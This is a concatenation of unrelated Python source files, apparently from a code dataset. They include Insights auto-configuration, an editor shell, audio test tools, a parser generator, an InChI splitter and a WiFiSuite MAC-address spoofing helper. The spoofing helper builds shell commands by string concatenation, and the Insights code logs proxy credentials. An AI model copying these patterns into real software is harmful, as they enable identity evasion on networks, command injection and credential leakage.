logger.debug(e)
logger.debug("Failed to find accurate branch_info")
return False
def set_auto_configuration(hostname, ca_cert, proxy):
"""
Set config based on discovered data
"""
logger.debug("Attempting to auto configure!")
logger.debug("Attempting to auto configure hostname: %s", hostname)
logger.debug("Attempting to auto configure CA cert: %s", ca_cert)
logger.debug("Attempting to auto configure proxy: %s", proxy)
saved_base_url = config['base_url']
if ca_cert is not None:
saved_cert_verify = config['cert_verify']
config['cert_verify'] = ca_cert
if proxy is not None:
saved_proxy
|
= config['proxy']
config['proxy'] = proxy
config['base_url'] = hostname + '/r/insights'
if not verify_connectivity():
logger.warn("Could not auto configure,
|
falling back to static config")
logger.warn("See %s for additional information",
constants.default_log_file)
config['base_url'] = saved_base_url
if proxy is not None:
if saved_proxy is not None and saved_proxy.lower() == 'none':
saved_proxy = None
config['proxy'] = saved_proxy
if ca_cert is not None:
config['cert_verify'] = saved_cert_verify
def _try_satellite6_configuration():
"""
Try to autoconfigure for Satellite 6
"""
try:
from rhsm.config import initConfig
rhsm_config = initConfig()
logger.debug('Trying to autoconf Satellite 6')
cert = file(rhsmCertificate.certpath(), 'r').read()
key = file(rhsmCertificate.keypath(), 'r').read()
rhsm = rhsmCertificate(key, cert)
# This will throw an exception if we are not registered
logger.debug('Checking if system is subscription-manager registered')
rhsm.getConsumerId()
logger.debug('System is subscription-manager registered')
rhsm_hostname = rhsm_config.get('server', 'hostname')
rhsm_hostport = rhsm_config.get('server', 'port')
rhsm_proxy_hostname = rhsm_config.get('server', 'proxy_hostname').strip()
rhsm_proxy_port = rhsm_config.get('server', 'proxy_port').strip()
rhsm_proxy_user = rhsm_config.get('server', 'proxy_user').strip()
rhsm_proxy_pass = rhsm_config.get('server', 'proxy_password').strip()
proxy = None
if rhsm_proxy_hostname != "":
logger.debug("Found rhsm_proxy_hostname %s", rhsm_proxy_hostname)
proxy = "http://"
if rhsm_proxy_user != "" and rhsm_proxy_pass != "":
logger.debug("Found user and password for rhsm_proxy")
proxy = proxy + rhsm_proxy_user + ":" + rhsm_proxy_pass + "@"
proxy = proxy + rhsm_proxy_hostname + ':' + rhsm_proxy_port
logger.debug("RHSM Proxy: %s", proxy)
logger.debug("Found Satellite Server Host: %s, Port: %s",
rhsm_hostname, rhsm_hostport)
rhsm_ca = rhsm_config.get('rhsm', 'repo_ca_cert')
logger.debug("Found CA: %s", rhsm_ca)
logger.debug("Setting authmethod to CERT")
config['authmethod'] = 'CERT'
# Directly connected to Red Hat, use cert auth directly with the api
if (rhsm_hostname == 'subscription.rhn.redhat.com' or
rhsm_hostname == 'subscription.rhsm.redhat.com'):
logger.debug("Connected to Red Hat Directly, using cert-api")
rhsm_hostname = 'cert-api.access.redhat.com'
rhsm_ca = None
else:
# Set the host path
# 'rhsm_hostname' should really be named ~ 'rhsm_host_base_url'
rhsm_hostname = rhsm_hostname + ':' + rhsm_hostport + '/redhat_access'
logger.debug("Trying to set auto_configuration")
set_auto_configuration(rhsm_hostname, rhsm_ca, proxy)
return True
except Exception as e:
logger.debug(e)
logger.debug('System is NOT subscription-manager registered')
return False
def _read_systemid_file(path):
with open(path, "r") as systemid:
data = systemid.read().replace('\n', '')
return data
def _try_satellite5_configuration():
"""
Attempt to determine Satellite 5 Configuration
"""
logger.debug("Trying Satellite 5 auto_config")
rhn_config = '/etc/sysconfig/rhn/up2date'
systemid = '/etc/sysconfig/rhn/systemid'
if os.path.isfile(rhn_config):
if os.path.isfile(systemid):
config['systemid'] = _read_systemid_file(systemid)
else:
logger.debug("Could not find Satellite 5 systemid file.")
return False
logger.debug("Found Satellite 5 Config")
rhn_conf_file = file(rhn_config, 'r')
hostname = None
for line in rhn_conf_file:
if line.startswith('serverURL='):
url = urlparse(line.split('=')[1])
hostname = url.netloc + '/redhat_access'
logger.debug("Found hostname %s", hostname)
if line.startswith('sslCACert='):
rhn_ca = line.strip().split('=')[1]
# Auto discover proxy stuff
if line.startswith('enableProxy='):
proxy_enabled = line.strip().split('=')[1]
if line.startswith('httpProxy='):
proxy_host_port = line.strip().split('=')[1]
if line.startswith('proxyUser='):
proxy_user = line.strip().split('=')[1]
if line.startswith('proxyPassword='):
proxy_password = line.strip().split('=')[1]
if hostname:
proxy = None
if proxy_enabled == "1":
proxy = "http://"
if proxy_user != "" and proxy_password != "":
logger.debug("Found user and password for rhn_proxy")
proxy = proxy + proxy_user + ':' + proxy_password
proxy = proxy + "@" + proxy_host_port
else:
proxy = proxy + proxy_host_port
logger.debug("RHN Proxy: %s", proxy)
set_auto_configuration(hostname, rhn_ca, proxy)
else:
logger.debug("Could not find hostname")
return False
return True
else:
logger.debug("Could not find rhn config")
return False
def try_auto_configuration():
"""
Try to auto-configure if we are attached to a sat5/6
"""
if config['auto_config'] and not config['offline']:
if not _try_satellite6_configuration():
_try_satellite5_configuration()
|
operatorequals/gatheros
|
gatheros/editor/cmd_interface.py
|
Python
|
bsd-3-clause
| 3,370
| 0.07092
|
import cmd
import json
import termcolor
from struct_manager import createEmptyCommandGroup, createEmptyStruct, createEmptyCommand
from populator import populateDict
class EditorShell ( cmd.Cmd ) :
def __init__ ( self, file ) :
cmd.Cmd.__init__(self)
self.file = file
# self.struct = json.load ( self.file )
try :
self.struct = json.load ( self.file )
except :
print "[!] Can't open the JSON file, creating a new struct"
self.struct = createEmptyStruct()
self.cur_node = self.struct
def do_add( self, line ) :
if not line :
return
line = line.strip()
toks = line.split()
ident = toks[0].lower()
if 'command' == ident :
self.do_add_command( ' '.join( toks [1:] ) )
pass # add command
elif 'group' == ident :
self.do_add_group( ' '.join( toks [1:] ) )
pass # add command
elif 'dependency' == ident :
pass # add command
else :
print " '%s' not available subcommand!" % ident
def do_add_group( self, line ) :
if not line :
print "Need a 'name' "
return
line = line.strip()
toks = line.split()
codename, group = createEmptyCommandGroup( toks[0] )
populateDict(group)
print group
self.struct['CommandGroups'][ codename ] = group
def do_add_command( self, line ) :
if not line :
print "Need a 'group code name' "
return
line = line.strip()
toks = line.split()
codename = toks[0]
unique, command = createEmptyCommand( )
populateDict( command )
self.struct['CommandGroups'][ codename ]['Commands'][ unique ] = command
print "Command '%s' created!" % unique
def do_add_dependency( self, line ) :
pass
def do_show_command( self, line ) :
pass
def do
|
_edit_command( self, line ) :
if not line :
print "Need a 'command identifier' "
return
line = line.strip()
toks = line.split()
        ident = toks[0]
        comm = None
for gname, group in self.st
|
ruct['CommandGroups'].iteritems() :
try :
comm = group['Commands'][ident]
break
except :
pass
if not comm :
print "Identifier '%s' doesn't exist" % comm
return
populateDict( comm, False )
def do_edit_group( self, line ) :
if not line :
print "Need a 'command identifier' "
return
line = line.strip()
toks = line.split()
gname = toks[0]
        group = self.struct['CommandGroups'].get(gname)
        if not group :
            print "Identifier '%s' doesn't exist" % gname
            return
        populateDict( group )
def do_list( self, line ) :
for group in self.struct['CommandGroups'].keys() :
print group
def do_list_commands( self, line ) :
for gname, group in self.struct['CommandGroups'].iteritems() :
print "=========== %s ===========" % group['name']
for k, v in group['Commands'].iteritems() :
print '''{0:24} -| {1:<64}\n-> {2:<64}
'''.format( k, v['command'].encode('utf8'), v['description'].encode('utf8') )
print "=========== --- ==========="
print
def do_save( self, line ) :
self.file.seek(0)
self.file.write( json.dumps( self.struct, indent = 1 ) + '\n' )
self.file.truncate()
def do_create_dependency( self, line ) :
if not line :
print "Need a 'name' "
return
line = line.strip()
toks = line.split()
dep = toks[0]
self.struct['DependencyTokens'].append( dep )
def do_d_list( self, line ) :
for group in self.struct.keys() :
print group
def do_d_show( self, line ) :
print json.dumps( self.struct, indent = 1 )
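# A hedged sketch of one way to launch this shell; the file name is a
# placeholder and nothing else in gatheros references this helper.
def _example_launch(path='commands.json'):
    """Open (or create) a struct file and drop into the editor shell."""
    import os
    mode = 'r+' if os.path.exists(path) else 'w+'
    fh = open(path, mode)
    try:
        EditorShell(fh).cmdloop()
    finally:
        fh.close()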
|
wallarelvo/racer
|
racer/roadmap.py
|
Python
|
apache-2.0
| 539
| 0
|
import networkx as nx
class Roadmap(nx.Graph):
def __init__(self, gd, max_dist, *args, **kwarg
|
s):
self.gd = gd
self.max_dist = max_dist
nx.Graph.__init__(self, *args, **kwargs)
def insert(self, sample):
self.gd.insert(sample)
for smpl in self.gd.get_nearest(sample):
if smpl == sample:
continue
if smpl.dist_to(sample) <= self.max_dist:
self.add_edge(smpl, sample
|
)
def make(*args, **kwargs):
return Roadmap(*args, **kwargs)
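# A hedged sketch of how Roadmap/make are meant to be used. Roadmap only assumes
# that `gd` exposes insert()/get_nearest() and that samples implement dist_to()
# and hashable equality; the stand-in classes below are invented for
# illustration and are not part of the racer package.
if __name__ == '__main__':
    import collections
    import math

    class _Point(collections.namedtuple('_Point', 'x y')):
        def dist_to(self, other):
            return math.hypot(self.x - other.x, self.y - other.y)

    class _NaiveIndex(object):
        """Toy stand-in for `gd`: remembers every sample and returns all of them."""
        def __init__(self):
            self.samples = []

        def insert(self, sample):
            self.samples.append(sample)

        def get_nearest(self, sample):
            return list(self.samples)

    rm = make(_NaiveIndex(), max_dist=2.0)
    for p in [_Point(0, 0), _Point(1, 0), _Point(5, 5)]:
        rm.insert(p)
    print(rm.edges())  # only samples within max_dist of each other get linked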
|
loopCM/chromium
|
chrome/test/functional/media/audio_tools.py
|
Python
|
bsd-3-clause
| 6,222
| 0.010125
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Audio tools for recording and analyzing audio.
The audio tools provided here are mainly to:
- record playing audio.
- remove silence from beginning and end of audio file.
- compare audio files using PESQ tool.
The tools are supported on Windows and Linux.
"""
import commands
import ctypes
import logging
import os
import re
import subprocess
import sys
import threading
import time
import pyauto_media
import pyauto
_TOOLS_PATH = os.path.abspath(os.path.join(pyauto.PyUITest.DataDir(),
'pyauto_private', 'media', 'tools'))
WINDOWS = 'win32' in sys.platform
if WINDOWS:
_PESQ_PATH = os.path.join(_TOOLS_PATH, 'pesq.exe')
_SOX_PATH = os.path.join(_TOOLS_PATH, 'sox.exe')
_AUDIO_RECORDER = r'SoundRecorder.exe'
else:
_PESQ_PATH = os.path.join(_TOOLS_PATH, 'pesq')
_SOX_PATH = commands.getoutput('which sox')
_AUDIO_RECORDER = commands.getoutput('which arecord')
_PACMD_PATH = commands.getoutput('which pacmd')
class AudioRecorderThread(threading.Thread):
"""A thread that records audio out of the default audio output."""
def __init__(self, duration, output_file, record_mono=False):
threading.Thread.__init__(self)
self.error = ''
self._duration = duration
self._output_file = output_file
self._record_mono = record_mono
def run(self):
"""Starts audio recording."""
if WINDOWS:
if self._record_mono:
raise
|
Exception("Mono recording not supported on Windows yet!")
duration = time.strftime('%H:%M:%S', time.gmtime(self._duration))
cmd = [_AUDIO_RECORDER, '/FILE', self._output_file, '/DURATION',
duration]
# This is needed to run SoundR
|
ecorder.exe on Win-64 using Python-32 bit.
ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(
ctypes.byref(ctypes.c_long()))
else:
num_channels = 1 if self._record_mono else 2
cmd = [_AUDIO_RECORDER, '-d', self._duration, '-f', 'dat', '-c',
str(num_channels), self._output_file]
cmd = [str(s) for s in cmd]
logging.debug('Running command: %s', ' '.join(cmd))
returncode = subprocess.call(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if returncode != 0:
self.error = 'Failed to record audio.'
else:
logging.debug('Finished recording audio into %s.', self._output_file)
def RunPESQ(audio_file_ref, audio_file_test, sample_rate=16000):
"""Runs PESQ to compare audio test file to a reference audio file.
Args:
audio_file_ref: The reference audio file used by PESQ.
audio_file_test: The audio test file to compare.
sample_rate: Sample rate used by PESQ algorithm, possible values are only
8000 or 16000.
Returns:
A tuple of float values representing PESQ scores of the audio_file_ref and
audio_file_test consecutively.
"""
# Work around a bug in PESQ when the ref file path is > 128 chars. PESQ will
# compute an incorrect score then (!), and the relative path to the ref file
# should be a lot shorter than the absolute one.
audio_file_ref = os.path.relpath(audio_file_ref)
cmd = [_PESQ_PATH, '+%d' % sample_rate, audio_file_ref, audio_file_test]
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error running pesq: %s\n%s', output, error)
# Last line of PESQ output shows the results. Example:
# P.862 Prediction (Raw MOS, MOS-LQO): = 4.180 4.319
result = re.search('Prediction.*= (\d{1}\.\d{3})\t(\d{1}\.\d{3})',
output)
if not result or len(result.groups()) != 2:
return None
return (float(result.group(1)), float(result.group(2)))
def RemoveSilence(input_audio_file, output_audio_file):
"""Removes silence from beginning and end of the input_audio_file.
Args:
input_audio_file: The audio file to remove silence from.
output_audio_file: The audio file to save the output audio.
"""
# SOX documentation for silence command: http://sox.sourceforge.net/sox.html
# To remove the silence from both beginning and end of the audio file, we call
# sox silence command twice: once on normal file and again on its reverse,
# then we reverse the final output.
# Silence parameters are (in sequence):
# ABOVE_PERIODS: The period for which silence occurs. Value 1 is used for
# silence at beginning of audio.
# DURATION: the amount of time in seconds that non-silence must be detected
# before sox stops trimming audio.
  # THRESHOLD: value used to indicate what sample value is treated as silence.
ABOVE_PERIODS = '1'
DURATION = '2'
THRESHOLD = '5%'
cmd = [_SOX_PATH, input_audio_file, output_audio_file, 'silence',
ABOVE_PERIODS, DURATION, THRESHOLD, 'reverse', 'silence',
ABOVE_PERIODS, DURATION, THRESHOLD, 'reverse']
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error removing silence from audio: %s\n%s', output, error)
def ForceMicrophoneVolumeTo100Percent():
if WINDOWS:
logging.error('Volume forcing not implemented on Windows yet.')
else:
# The recording device id is machine-specific. We assume here it is called
# Monitor of render (which corresponds to the id render.monitor). You can
# list the available recording devices with pacmd list-sources.
RECORDING_DEVICE_ID = 'render.monitor'
HUNDRED_PERCENT_VOLUME = '65536'
cmd = [_PACMD_PATH, 'set-source-volume', RECORDING_DEVICE_ID,
HUNDRED_PERCENT_VOLUME]
logging.debug('Running command: %s', ' '.join(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
logging.error('Error forcing mic volume to 100%%: %s\n%s', output, error)
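# A hedged sketch of how the pieces above are meant to be chained: record the
# audio that is playing, trim leading/trailing silence, then score the capture
# against a reference with PESQ. The file names are placeholders and nothing in
# the test suite calls this helper.
def _example_record_and_score(reference_wav, duration_secs=10):
  """Record audio, strip silence and return the (raw MOS, MOS-LQO) PESQ scores."""
  recorded = 'recorded.wav'
  trimmed = 'recorded_trimmed.wav'
  ForceMicrophoneVolumeTo100Percent()
  recorder = AudioRecorderThread(duration_secs, recorded)
  recorder.start()
  recorder.join()
  if recorder.error:
    raise RuntimeError(recorder.error)
  RemoveSilence(recorded, trimmed)
  return RunPESQ(reference_wav, trimmed)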
|
thinkasoft/ProyectoRD-dev
|
l10n_ve_withholding_islr/__init__.py
|
Python
|
agpl-3.0
| 1,587
| 0.002522
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
###########################################################################
# Module Written to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.c
|
om.ve>).
# All Rights Reserved
###############Credits######################################################
# Coded by: Humberto Arocha <hbto@vauxoo.com>
# María Gabriela Quilarque <gabriela@vauxoo.com>
# Javier Duran <javier@vauxoo.com>
# Planified by: Nhomar Hernandez
# Finance by: Helados Gil
|
da, C.A. http://heladosgilda.com.ve
# Audited by: Humberto Arocha humberto@openerp.com.ve
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
import model
import report
import wizard
#import edi
|
sahat/bokeh
|
examples/plotting/cloud/candlestick.py
|
Python
|
bsd-3-clause
| 853
| 0.009379
|
from math import pi
import pandas as pd
from bokeh.sampledata.stocks import MSFT
from bokeh.plotting import *
df = pd.DataFrame(MSFT)[:50]
df['date'] = pd.to_datetime(df['date'])
mids = (df.open + df.close)/2
spans = abs(df.close-df.open)
inc = df.close > df.open
dec = df.open > df.close
w = 12*60*60*1000 # half day in ms
output_cloud("candlestick")
figure(x_axis_type = "datetime", tools="pan,wheel_zoom,box_zoom,reset,previewsave",
width=1000, name="candlestick")
hold()
segment(df.date, df.high, df.date, df.low, color='black')
rect(df.date[inc], mids[inc], w, spans[inc], fill_color="#D5E1DD", line_color="black")
rect(df.
|
date[dec], mids[dec], w, spans[dec], fill_color="#F2583E", line_co
|
lor="black")
curplot().title = "MSFT Candlestick"
xaxis().major_label_orientation = pi/4
grid().grid_line_alpha=0.3
# open a browser
show()
|
cn-app-registry/cnr-server
|
appr/api/config.py
|
Python
|
apache-2.0
| 545
| 0
|
from __future__ import absolute_import, division, print_function
import os
class Config(object):
""" Default configuration """
DEBUG = False
APPR_URI = os.getenv('APPR_URI', "http://localhost:5000")
class ProductionConfig(Config):
""" Production configuration """
APPR_URI = "ht
|
tp://localhost:5000"
APPR_BACKEND = 'false'
class DevelopmentConfig(Config):
""" Development configuration """
DEBUG = True
# APPR_URI = 'https://api.appr.sh'
APPR_URI = os.getenv('APPR_URI', "http://loc
|
alhost:5000")
|
NickSanzotta/WiFiSuite
|
wifisuite/helpers/macchange.py
|
Python
|
mit
| 1,617
| 0.019171
|
# Module: macchanger.py
# Description: Wrapper for built-in linux tool macchanger.
# Author: Nick Sanzotta/@Beamr
# Version: v 1.09252017
try:
import os, sys, time
from subprocess import Popen, PIPE
from theme import *
except Exception as e:
    print('\n [!] MACCHANGE - Error: %s' % (e))
sys.exit(1)
def macRandom(interface):
wirelessInt = str(interface.get_ifname())
p1 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(normal('i') + 'Current MAC Address: %s' % (p1.communicate()[0].rstrip('\n')))
os.system('ifconfig ' + wirelessInt + ' down')
os.system('macchanger -r ' + wirelessInt + ' > /dev/null')
os.system('ifconfig ' + wirelessInt + ' up')
p2 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(bl
|
ue('*') + 'New MAC Address: %s' % (p2.communicate()[0].rstrip('\n')))
def macManual(interface, macaddress):
wirelessInt = str(interface.get_ifname())
p1 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(normal('i') + 'Current MAC Address: %s' % (p1.communicate()[0].rstrip('\n')))
os.system('ifconfig ' + wirelessInt + ' down')
os.system('macchange
|
r -m ' + macaddress + ' ' + wirelessInt + ' > /dev/null')
os.system('ifconfig ' + wirelessInt + ' up')
p2 = Popen(["ifconfig " + wirelessInt + " | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'"], shell=True, stdout=PIPE)
print(blue('*') + 'New MAC Address: %s' % (p2.communicate()[0].rstrip('\n')))
|
swesterfeld/beast
|
yapps2_deb/yapps2.py
|
Python
|
lgpl-2.1
| 4,135
| 0.006288
|
#!/usr/bin/env python2
#
# Yapps 2 - yet another python parser system
# Copyright 1999-2003 by Amit J. Patel <amitp@cs.stanford.edu>
#
# This version of Yapps 2 can be distributed under the
# terms of the MIT open source license, either found in the LICENSE file
# included with the Yapps distribution
# <http://theory.stanford.edu/~amitp/yapps/> or at
# <http://www.opensource.org/licenses/mit-license.php>
#
import sys, re
from yapps import runtime, parsetree
def generate(inputfilename, outputfilename='', dump=0, **flags):
"""Generate a grammar, given an input filename (X.g)
and an output filename (defaulting to X.py)."""
if not outputfilename:
if inputfilename.endswith('.g'):
outputfilename = inputfilename[:-2] + '.py'
else:
raise Exception('Must specify output filename if input filename is not *.g')
DIVIDER = '\n%%\n' # This pattern separates the pre/post parsers
preparser, postparser = None, None # Code before and after the parser desc
# Read the entire file
s = open(inputfilename,'r').read()
# See if there's a separation between the pre-parser and parser
f = s.find(DIVIDER)
if f >= 0: preparser, s = s[:f]+'\n\n', s[f+len(DIVIDER):]
    # See if there's a separation between the parser and post-parser
f = s.find(DIVIDER)
if f >= 0: s, postparser = s[:f], '\n\n'+s[f+len(DIVIDER):]
# Create the parser and scanner and parse the text
    scanner = grammar.ParserDescriptionScanner(s, filename=inputfilename)
if preparser: scanner.del_line += preparser.count('\n')
parser = grammar.ParserDescription(scanner)
t = runtime.wrap_error_reporter(parser, 'Parser')
if t is None: return 1 # Failure
if preparser is not None: t.preparser = preparser
if postparser is not None: t.postparser = postparser
# Check the options
for f in t.options.keys():
for opt,_,_ in yapps_options:
if f == opt: break
else:
print >>sys.stderr, 'Warning: unrecognized option', f
# Add command line options to the set
for f in flags.keys(): t.options[f] = flags[f]
# Generate the output
if dump:
t.dump_information()
else:
t.output = open(outputfilename, 'w')
t.generate_output()
return 0
if __name__ == '__main__':
import doctest
doctest.testmod(sys.modules['__main__'])
doctest.testmod(parsetree)
# Someday I will use optparse, but Python 2.3 is too new at the moment.
yapps_options = [
('context-insensitive-scanner',
'context-insensitive-scanner',
'Scan all tokens (see docs)'),
]
import getopt
optlist, args = getopt.getopt(sys.argv[1:], 'f:', ['help', 'dump', 'use-devel-grammar'])
if not args or len(args) > 2:
print >>sys.stderr, 'Usage:'
print >>sys.stderr, ' python', sys.argv[0], '[flags] input.g [output.py]'
print >>sys.stderr, 'Flags:'
print >>sys.stderr, (' --dump' + ' '*40)[:35] + 'Dump out grammar information'
print >>sys.stderr, (' --use-devel-grammar' + ' '*40)[:35] + 'Use the devel grammar parser from yapps_grammar.py instead of the stable grammar from grammar.py'
for flag, _, doc in yapps_options:
print >>sys.stderr, (' -f' + flag + ' '*40)[:35] + doc
else:
# Read in the options and create a list of flags
flags = {}
use_devel_grammar = 0
for opt in optlist:
for flag, name, _ in yapps_options:
if opt == ('-f', flag):
flags[name] = 1
break
else:
if opt == ('--dump', ''):
flags['dump'] = 1
elif opt == ('--use-devel-grammar', ''):
use_devel_grammar = 1
else:
print >>sys.stderr, 'Warning: unrecognized option', opt[0], opt[1]
if use_devel_grammar:
import yapps_grammar as grammar
else:
from yapps import grammar
sys.exit(generate(*tuple(args), **flags))
|
nbateshaus/chem-search
|
inchi-split/splitter.py
|
Python
|
bsd-3-clause
| 9,306
| 0.016548
|
import re
from collections import namedtuple
# this is almost a validating expression, it could certainly be simpler by just using [^/]* inside the groups
chargeDef = r"(/q[\-\+0-9;\*mMnNi]*)?"
protonationDef = r"(/p[\-\+0-9,;]*)?"
isotopeDef = r"(/i[\-\+0-9,;HDT]*(?:/h[0-9HDT]+)*)?"
stereoBondDef=r"(/b[\-\+0-9,\?\*;mNnNi]*)?"
stereoTetDef=r"(/t[\-\+0-9,\?;\*mMnNi]*)?"
stereoMDef=r"(/m[\-\+0-9,;\.]*)?"
stereoSDef=r"(/s[\-\+0-9,;]*)?"
inchiLayers=(
r"(InChI=1S?)",
r"(/[a-zA-Z0-9\.]*)", # formula
r"(/c[0-9\(\)\-\,\*;]*)?", # skeleton
r"(/h[0-9,\-\Hh\*\(\);]*)?", # hydrogens
chargeDef, # charge
protonationDef, # protonation
stereoBondDef, # stereo_bond
stereoTetDef, #stereo_tet
stereoMDef, #stereo_m
stereoSDef, #stereo_s
isotopeDef, #isotope
stereoBondDef, #isotope_stereo_bond
stereoTetDef, #isotope_stereo_tet
stereoMDef, #isotope_stereo_m
stereoSDef, #isotope_stereo_s
r"(/f[a-zA-Z0-9\.]*(?:/h[0-9,\-\Hh\*\(\);]*)?)?", # fixed_h
chargeDef, # fixedh_charge
protonationDef, # fixedh_protonation
stereoBondDef, #fixedh_stereo_bond
stereoTetDef, #fixedh_stereo_tet
stereoMDef, #fixedh_stereo_m
stereoSDef, #fixedh_stereo_s
isotopeDef, #fixedh_isotope
stereoBondDef, #fixedh_isotope_stereo_bond
stereoTetDef, #fixedh_isotope_stereo_tet
stereoMDef, #fixedh_isotope_stereo_m
stereoSDef, #fixedh_isotope_stereo_s
r"(/o[\(\)0-9,]*)?", # transposition
r"(/r.*)?", # reconnected_main # <- FIX: we punt on this
)
coreExpr=re.compile(''.join(inchiLayers))
Layers=namedtuple("Layers",['start','formula','skeleton','hydrogens',
# pos 4
'charge','protonation',
# pos 6
'stereo_bond','stereo_tet','stereo_m','stereo_s',
# pos 10
'isotope','isotope_stereo_bond','isotope_stereo_tet','isotope_stereo_m','isotope_stereo_s',
# pos 15
'fixedh','fixedh_charge','fixedh_protonation',
# pos 18
'fixedh_stereo_bond','fixedh_stereo_tet','fixedh_stereo_m','fixedh_stereo_s',
# pos 22
'fixedh_isotope','fixedh_isotope_stereo_bond','fixedh_isotope_stereo_tet','fixedh_isotope_stereo_m','fixedh_isotope_stereo_s',
# pos 27
'transposition',
'reconnected_main'
])
layerGroups = {
'main':tuple(range(4)),
'charge':tuple(range(4,6)),
'stereo':tuple(range(6,10)),
'isotope':tuple(range(10,15)),
'fixedh':tuple(range(15,27)),
}
def formulaGrouping(tpl):
return (tpl[0],tpl[1],)
def mainGrouping(tpl):
return (tpl[x] for x in layerGroups['main'])
def chargeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge'])
def stereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo'])
def isotopeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['isotope'][0:1])
def isotopestereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['isotope'])
def stereo_isotopeGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo']+layerGroups['isotope'][0:1])
def stereo_isotopestereoGrouping(tpl):
return (tpl[x] for x in layerGroups['main']+layerGroups['charge']+layerGroups['stereo']+layerGroups['isotope'])
def extractLayers(inchi):
"""
>>> tpl=extractLayers('InChI=1S/C16H20N4O3/c1-9(21)19-15(18-4)20-13-11-7-10(8-17)5-6-12(11)23-16(2,3)14(13)22/h5-7,13-14,22H,1-4H3,(H2,18,19,20,21)/t13?,14-/m0/s1')
>>> tpl.start
'InChI=1S'
>>> tpl.formula
'C16H20N4O3'
>>> tpl.skeleton
'c1-9(21)19-15(18-4)20-13-11-7-10(8-17)5-6-12(11)23-16(2,3)14(13)22'
>>> tpl.hydrogens
'h5-7,13-14,22H,1-4H3,(H2,18,19,20,21)'
>>> tpl.charge
''
>>> tpl.protonation
''
>>> tpl.stereo_bond
''
>>> tpl.stereo_tet
't13?,14-'
>>> tpl.stereo_m
'm0'
>>> tpl.stereo_s
's1'
>>> tpl.isotope
''
>>> tpl.fixedh
''
Charge layers:
From [O-]CCCC[NH3+]
>>> tpl = extractLayers('InChI=1S/C4H10NO/c5-3-1-2-4-6/h1-5H2/q-1/p+1')
>>> tpl.charge
'q-1'
>>> tpl.protonation
'p+1'
Stereochemistry:
From [O-][C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1S/C9H12ClN2O3/c10-7(13)3-1-2-6(4-8(11)14)5-9(12)15/h1-3,7H,4-5H2,(H2,11,14)(H2,12,15)/q-1/b3-1+/t7-/m0/s1')
>>> tpl.stereo_bond
'b3-1+'
>>> tpl.stereo_tet
't7-'
>>> tpl.stereo_m
'm0'
>>> tpl.stereo_s
's1'
Isotopes:
From: [13CH3]O
>>> tpl = extractLayers('InChI=1S/CH4O/c1-2/h2H,1H3/i1+1')
>>> tpl.isotope
'i1+1'
>>> tpl.isotope_stereo_tet
''
Isotope + stereo
From: [13CH3]O[C@H](C)O
>>> tpl = extractLayers('InChI=1S/C3H7ClO/c1-3(4)5-2/h3H,1-2H3/t3-/m1/s1/i2+1')
>>> tpl.isotope
'i2+1'
>>> tpl.stereo_tet
't3-'
>>> tpl.isotope_stereo_tet
''
Isotope causes stereo
From: [13CH3][C@H](C)O
>>> tpl = extractLayers('InChI=1S/C3H8O/c1-3(2)4/h3-4H,1-2H3/i1+1/t3-/m1/s1')
>>> tpl.isotope
'i1+1'
>>> tpl.stereo_tet
''
>>> tpl.isotope_stereo_tet
't3-'
Isotope causes stereo + standard stereo
From: [13CH3][C@H](C)O[C@H](C)O
>>> tpl = extractLayers('InChI=1S/C5H12O2/c1-4(2)7-5(3)6/h4-6H,1-3H3/t5-/m1/s1/i1+1/t4-,5-')
>>> tpl.isotope
'i1+1'
>>> tpl.stereo_tet
't5-'
>>> tpl.isotope_stereo_tet
't4-,5-'
    Fixed Hs and Isotopes
From: O=C([18O])/C=C/C(=[18O])O
>>> tpl = extractLayers('InChI=1/C4H3O4/c5-3(6)1-2-4(7)8/h1-2H,(H,5,6)/b2-1+/i5+2,7+2/f/h5H/i6+2,7+2')
>>> tpl.isotope
'i5+2,7+2'
>>> tpl.fixedh_isotope
'i6+2,7+2'
Fixed Hs causes stereo_bond
    From: F[C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
